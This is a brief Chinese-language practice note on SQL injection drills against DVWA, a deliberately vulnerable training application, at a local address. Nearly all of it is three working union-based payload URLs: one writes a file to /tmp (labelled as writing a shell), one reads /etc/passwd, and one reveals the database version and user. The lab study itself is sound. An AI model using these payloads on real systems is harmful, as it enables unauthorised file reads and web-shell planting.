下载了dvwa,对SQL注入进行演练。
使用了以下语句:
写shell:
http://192.168.0.106/dvwa/vulnerabilities/sqli_blind/ ?id='+union+select+2,'hello'+into+outfile+'/tmp/tt32.php'++--+ &Submit=Submit#
读取文件:
http://192.168.0.106/dvwa/vulnerabilities/sqli_blind/ ?id='+union+select+2,load_file('/etc/passwd')+--+ &Submit=Submit#
读取PHP版本/查看当前用户
http://192.168.0.106/dvwa/vulnerabilities/sqli_blind/ ?id='+union+select+version(),user()+--+ &Submit=Submit#